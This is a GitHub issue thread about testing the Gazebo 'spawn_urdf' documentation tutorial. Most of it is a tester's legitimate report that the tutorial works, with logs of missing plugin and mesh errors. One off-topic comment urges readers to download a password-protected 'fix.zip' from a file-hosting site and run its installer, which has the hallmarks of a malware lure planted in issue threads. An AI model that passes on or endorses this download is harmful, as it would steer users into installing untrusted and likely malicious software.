gazebosim/gazebo_test_cases #1068: docs: spawn_urdf

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/spawn_urdf)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/spawn_urdf.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

EnzoGhisoni, 2024-08-30:
I am interested to test this

EnzoGhisoni, 2024-08-31:
Step 1 - Instructions work
The tutorial is working as expected (video attached in the step2). The only issues is that we have error messages (that are not preventing the tutorial to work) in the simulation terminal:

(2024-09-01 00:38:28.688) [error] Failed to load system plugin [libgazebo_ros_control.so] : Could not find shared library.
(2024-09-01 00:38:28.689) [error] Failed to load system plugin [libgazebo_ros_camera.so] : Could not find shared library.
(2024-09-01 00:38:28.689) [error] Failed to load system plugin [libgazebo_ros_gpu_laser.so] : Could not find shared library.
(2024-09-01 00:38:28.786) [error] [GUI] Unable to find file with URI [model://rrbot_description/meshes/hokuyo.dae]
(2024-09-01 00:38:28.786) [error] [GUI] Could not resolve file [model://rrbot_description/meshes/hokuyo.dae]
(2024-09-01 00:38:28.786) [error] [GUI] Unable to find file[model://rrbot_description/meshes/hokuyo.dae]
(2024-09-01 00:38:28.786) [error] [GUI] Failed to load geometry for visual: link3_fixed_joint_lump__hokuyo_link_visual_2

I think it's mostly related to the fact that the service has issues to find the dependante file of the URDF. It could be interesting to indicate a bit more the setup required to make work the URDF or provide an URDF without meshes file imported to test it in standalone.

Step 2 - Images (if there are any) match the result
[record_gazebo_sim.webm](https://github.com/user-attachments/assets/28818b10-f04d-47ea-b428-7fc176ff49e7)

EnzoGhisoni, 2024-09-03:
I tried to redo the tutorial with a setup ros2 rolling on the docker (installation debian)
The tutorial is still working as expected but I still have the error messages with the provided URDF file in the example:

(2024-09-03 17:40:01.877) [error] Failed to load system plugin [libgazebo_ros_control.so] : Could not find shared library.
(2024-09-03 17:40:01.877) [error] Failed to load system plugin [libgazebo_ros_camera.so] : Could not find shared library.
(2024-09-03 17:40:01.878) [error] Failed to load system plugin [libgazebo_ros_gpu_laser.so] : Could not find shared library.
(2024-09-03 17:40:01.950) [error] [GUI] Unable to find file with URI [model://rrbot_description/meshes/hokuyo.dae]
(2024-09-03 17:40:01.950) [error] [GUI] Could not resolve file [model://rrbot_description/meshes/hokuyo.dae]
(2024-09-03 17:40:01.950) [error] [GUI] Unable to find file[model://rrbot_description/meshes/hokuyo.dae]
(2024-09-03 17:40:01.950) [error] [GUI] Failed to load geometry for visual: link3_fixed_joint_lump__hokuyo_link_visual_2

I have built from source the package on the branch ahcorde/port/ros2.

I still have the same result. The tutorial in the simulation point of view is working as expected but there is still the error messages.
I don't know if it's enough to be validated.